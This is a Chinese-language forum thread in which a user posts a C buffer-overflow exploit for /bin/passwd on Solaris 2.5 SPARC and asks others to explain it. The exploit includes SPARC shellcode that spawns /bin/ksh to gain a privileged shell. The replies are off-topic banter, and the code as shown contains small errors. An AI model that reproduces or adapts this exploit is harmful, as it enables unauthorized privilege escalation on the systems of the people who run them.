高手请进：解读一个缓存溢出的小黑客程序。

anson23

这好象是一个关于缓存溢出的小程序，有哪位高手可以解读？：
听说他可以执行SHELLCODE？再非ROOT用户下！
/*## /bin/passwd #*/

#define NOPNUM 5000
#define ADRNUM 3000
#define ALLIGN 1

char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;

char jump[]=
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
char buffer[10000],adr[4],*b;
int i;

printf("/bin/passwd for solaris 2.5 2.5.1 sparc\n\n";

*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+5688+2000;

b=buffer;
for(i=0;i<3;i++) *b++=0xff;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<strlen(shellcode);i++) *b++=shellcode;
*b=0;

execle("/bin/passwd","lsd",buffer,0,0);
}

夜深人静

靠  这是shell的程序吗？？？！！！

搞清楚好不好。

laoxia

夜半一声断喝
老虾差点休克
以为哪里做错
原来非是己过

        ===南无阿弥陀佛===

nkliyong

原帖由 "laoxia" 发表：

        ===南无阿弥陀佛===

本来俺都难过死拉,
被迫从热被窝里爬出来赶到单位处理问题
正异常郁闷
忽然又看到那长可爱的笑脸
俺也笑了.

laoxia

原帖由 "nkliyong" 发表：

本来俺都难过死拉,
被迫从热被窝里爬出来赶到单位处理问题
正异常郁闷

难怪火气大。。。俺差点*裤子呢


天降大人于斯人，必先苦其心智。。。。。。